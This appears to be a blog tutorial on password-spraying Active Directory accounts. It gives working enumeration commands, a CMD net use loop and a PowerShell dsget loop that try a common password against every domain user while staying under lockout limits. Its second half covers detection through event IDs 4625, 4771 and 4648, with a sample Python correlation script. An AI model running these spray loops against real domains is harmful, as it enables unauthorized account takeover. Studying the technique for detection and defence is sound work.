Active Directory Password Spray Attack

In a password spray attack, the hacker tries the most common passwords across many different accounts and services to gain access to any password-protected assets they can find. Usually, these span many different organizations and identity providers.

For example, a hacker will use a commonly available toolkit to enumerate all of the users in several organizations and then try a common password against all of those accounts.

For the hacker, it’s a numbers game: they know that some passwords are very common. Even though these most common passwords account for only 5% of accounts, the hacker will get a few successes for every thousand accounts attacked, and that’s enough to be effective.

They use the accounts to get emails, harvest contact info, send phishing links, or expand the password spray target group. The hacker doesn’t care much about who those initial targets are—just that they have some success that they can leverage.

The way to run Password Spray Attack

First, the hacker creates a list of account names, either by querying Active Directory with PowerShell or the command line, or by harvesting usernames from open sources.

Then a shared password is used, say “P@ssw0rd” or “Aa123456!”, and a login is attempted for each username on the list.

Because of account lockout policies, this has to be done carefully so that users do not get locked out of their accounts: guess one single password for each user per observation window, so you don't risk locking out accounts.

First, check the password policy, which includes the lockout settings, with the following command:
net accounts /domain

Once you know the password policy, you can create a list using PowerShell or CMD with the following command:

wmic UserAccount Get Name > C:\Attack\PSSpray.txt

Optional PowerShell one-liner to view all users:

([adsisearcher]"objectCategory=User").Findall() | ForEach {$_.properties.samaccountname}


Then test each credential with the following “FOR” loop, which mounts the share \\%LOGONSERVER%\IPC$ using each username in PSSpray.txt and the password you have placed in the file Password.txt:

REM One logon attempt per username; the session is deleted again on success so the next attempt starts clean
@FOR /F %n in (C:\Attack\PSSpray.txt) DO @FOR /F %p in (C:\Attack\Password.txt) DO @net use %LOGONSERVER%\IPC$ /user:%USERDOMAIN%\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %LOGONSERVER%\IPC$ > NUL

Another useful script for running a password spray:

# Write the distinguished name of up to 100 users in the OU to PasswordSpray.txt, one per line
Get-ADUser -SearchBase "OU=CloudUsers,dc=Cloud,dc=ms" -Filter * -ResultSetSize 100 | Select-Object -ExpandProperty distinguishedName | Set-Content PasswordSpray.txt

Foreach ($FQDN in Get-Content .\PasswordSpray.txt) {
    # dsget prints a header line first, so the sAMAccountName is on the second line
    $results = dsget user $FQDN -samid
    $samid = $results[1].replace(" ", "")
    # Bind as that user with the shared password; $? is $true only if dsget succeeded
    dsget user $FQDN -u $samid -p 'Aa123456!' > $null
    if ($?) { Write-Host "Account: $samid; Password: Aa123456!" }
}

Note: Make sure to add a common password to Password.txt

The simplest way is to run the DomainPasswordSpray.ps1 script against all users, or half of them, with a standard password.

Tip: You can run a password spray attack over a network share connection or an Active Directory connection.

How to Detect Password Spray Attack

To detect password spraying, we need to pay attention to the Windows security event that means an account failed to log on. Failed logons are reported all the time.

However, if one computer fails to log in with several correct usernames but the wrong password, that should be treated as suspicious. You can find all of this information in the Windows event log. The fields we need to correlate against are:

  • Logon Type
  • Account Name
  • Status
  • Sub Status
  • Workstation Name
  • Source Network Address

To detect password spraying, you need the following event IDs from the security event log:

  • 4771
  • 4648
  • 4625
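Correlation logic for the fields and event IDs listed above, as an added example that is not from the original post: it runs over constructed sample 4625/4771 records (field names as a SIEM export might normalize them, an assumption) and flags a source address that fails with a wrong password against many distinct valid accounts, the spray signature, while ignoring unknown-user failures and one user's repeated typos.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log records as a SIEM might export them (not real data).
# 4625 Sub Status 0xC000006A = valid account, wrong password; 0xC0000064 = unknown user name.
# 4771 Failure Code 0x18 = Kerberos pre-authentication failed (wrong password).
def _ev(t, eid, account, source, **extra):
    return {"time": f"2024-03-01T{t}", "id": eid, "account": account, "source": source, **extra}

SAMPLE_EVENTS = [
    _ev("09:00:01", 4625, "alice", "10.0.0.17", logon_type=3, sub_status="0xC000006A"),
    _ev("09:00:02", 4625, "bob", "10.0.0.17", logon_type=3, sub_status="0xC000006A"),
    _ev("09:00:03", 4625, "carol", "10.0.0.17", logon_type=3, sub_status="0xC000006A"),
    _ev("09:00:04", 4625, "dave", "10.0.0.17", logon_type=3, sub_status="0xC000006A"),
    _ev("09:00:05", 4625, "nosuchuser", "10.0.0.17", logon_type=3, sub_status="0xC0000064"),
    _ev("09:00:06", 4625, "erin", "10.0.0.17", logon_type=3, sub_status="0xC000006A"),
    _ev("09:00:07", 4771, "frank", "10.0.0.17", failure_code="0x18"),
    # One user mistyping their own password twice from another host: not spraying.
    _ev("09:05:00", 4625, "alice", "10.0.0.5", logon_type=2, sub_status="0xC000006A"),
    _ev("09:05:09", 4625, "alice", "10.0.0.5", logon_type=2, sub_status="0xC000006A"),
]

def is_wrong_password(ev):
    """True only for failures that show the account exists and the password was wrong."""
    if ev["id"] == 4625:
        return ev.get("sub_status") == "0xC000006A"
    if ev["id"] == 4771:
        return ev.get("failure_code") == "0x18"
    return False

def detect_spray(events, window=timedelta(minutes=30), min_accounts=5):
    """Map each source address to the distinct valid accounts it failed against with a
    wrong password inside one sliding window, for sources reaching min_accounts
    (one origin, many users, few attempts each)."""
    by_source = defaultdict(list)
    for ev in events:
        if is_wrong_password(ev):
            by_source[ev["source"]].append((datetime.fromisoformat(ev["time"]), ev["account"].lower()))
    hits = {}
    for source, attempts in by_source.items():
        attempts.sort()
        lo = 0
        for hi, (t_hi, _) in enumerate(attempts):
            while t_hi - attempts[lo][0] > window:
                lo += 1
            accounts = {a for _, a in attempts[lo:hi + 1]}
            if len(accounts) >= min_accounts:
                hits[source] = sorted(accounts | set(hits.get(source, [])))
    return hits

if __name__ == "__main__":
    for src, accts in detect_spray(SAMPLE_EVENTS).items():
        print(f"[!] possible password spray from {src}: {len(accts)} accounts {accts}")
```

Thresholds are site-specific: set min_accounts below the domain lockout threshold multiplied by the number of users an attacker could plausibly enumerate, and keep the window at or above the lockout observation window from `net accounts /domain`.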


In conclusion

During a password spraying attack we hope to compromise one or more accounts by guessing their passwords, all without triggering the AD lockout policy on any account. When password spraying, the prevailing assumption is that you cannot brute force, so you try a few passwords, fewer than the domain lockout threshold allows, against every account in the domain.

AD Security Inside – Attacks Introduction
